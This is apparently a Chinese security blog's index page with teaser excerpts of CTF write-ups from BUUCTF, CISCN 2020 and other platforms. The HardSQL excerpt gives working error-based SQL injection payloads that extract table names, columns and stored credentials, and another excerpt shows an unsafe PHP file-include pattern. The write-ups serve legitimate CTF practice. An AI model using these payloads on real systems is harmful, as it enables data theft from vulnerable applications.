百道CTF刷题记录(四)之BUUCTF

百道CTF刷题记录(四)之BUUCTF

前言

接上篇,继续刷题

正文

[极客大挑战 2019]HardSQL

考点:报错注入。过滤了空白字符、=

EXP:

1
2
3
4
5
6
7
8
9
10
# 取表名
check.php?username=1&password=1%27^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)regexp(database())),0x7e),1)%23

# 取列名
check.php?username=1&password=1%27^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_schema)regexp(database())),0x7e),1)%23

# 读数据
check.php?username=1&password=1%27^updatexml(1,concat(0x7e,(select(group_concat(id,password,username))from(H4rDsq1)),0x7e),1)%23

# 读取不全使用right()取右边部分内容
阅读更多
2020重庆市教育系统网络安全攻防竞赛决赛 - Web Writeup
CISCN 2020 Web WriteUp

CISCN 2020 Web WriteUp

前言

今天刚打了CISCN2020,简单的WEB题都没有AK… 太菜了

题解

easyphp

通过题目描述猜测本题的考点应该是要让子线程非正常退出,执行phpinfo()得到flag。

阅读更多
百道CTF刷题记录(三)之BUUCTF

百道CTF刷题记录(三)之BUUCTF

前言

接上篇,继续刷题。

刷题之旅

[ACTF2020 新生赛]Include

打开题目,可以看到有个tips的跳转链接,点击后跳转到:

1
/?file=flag.php

结合题目猜测源码为:

1
2
3
<?php
include $_GET['file'];
?>
阅读更多
百道CTF刷题记录(二)之BUUCTF

百道CTF刷题记录(二)之BUUCTF

前言

最近好久没刷CTF题了,其实BUUCTF这个平台我也是最开始的用户之一(uid前20,懒狗石锤了…),可是一直没有时间能够好好的刷题,今儿总算时间充裕,打算花些时日,记录下自己在BUU刷题的经验。

刷题之旅

[HCTF 2018]WarmUp

打开题目页面,习惯性右键查看HTML源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<!--source.php-->

<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
阅读更多
2019全国大学生信息安全大赛两道web
百道CTF刷题记录(一)之实验吧
CTF实验吧让我进去writeup

CTF实验吧让我进去writeup

初探题目


两个表单,我们用burp抓包试试

这时候我们发现Cookie值里有个很奇怪的值是source,这个单词有起源的意思,我们就可以猜测这个是判断权限的依据,让我们来修改其值为1,发送得到如下显示:

阅读更多